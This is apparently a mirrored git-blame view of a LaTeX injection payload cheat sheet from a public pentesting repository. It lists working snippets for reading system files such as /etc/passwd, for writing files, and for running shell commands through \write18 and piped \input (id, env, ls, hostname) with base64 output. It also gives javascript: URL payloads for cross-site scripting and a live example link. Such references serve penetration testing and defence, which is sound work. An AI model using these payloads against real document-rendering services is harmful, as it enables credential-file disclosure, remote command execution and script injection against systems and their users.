1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-12 06:26:08 +02:00
PayloadsAllTheThings/LaTeX Injection/README.md

103 lines
2.2 KiB
Markdown
Raw Normal View History

# LaTex Injection
## Read file
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
Read file and interpret the LaTeX code in it:
```tex
\input{/etc/passwd}
2021-09-29 07:28:11 +02:00
\include{somefile} # load .tex file (somefile.tex)
```
2021-09-29 07:28:11 +02:00
Read single lined file:
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
```tex
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
2021-09-29 07:28:11 +02:00
Read multiple lined file:
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
```tex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
2018-08-12 23:30:22 +02:00
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
2021-09-29 07:28:11 +02:00
Read text file, **without** interpreting the content, it will only paste raw file content:
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
```tex
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
If injection point is past document header (`\usepackage` cannot be used), some control
characters can be deactivated in order to use `\input` on file containing `$`, `#`,
`_`, `&`, null bytes, ... (eg. perl scripts).
```tex
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}
```
## Write file
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
Write single lined file:
```tex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
2021-09-29 07:28:11 +02:00
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
```
## Command execution
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
```tex
\immediate\write18{id > output}
\input{output}
```
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
2018-08-12 23:30:22 +02:00
2021-09-29 07:28:11 +02:00
```tex
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
2021-09-29 07:28:11 +02:00
```tex
\input|ls|base64
\input{|"/bin/hostname"}
```
## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
2021-09-29 07:28:11 +02:00
```tex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`
2018-12-24 15:02:50 +01:00
## References
2018-08-12 23:30:22 +02:00
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
2021-09-29 07:28:11 +02:00
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)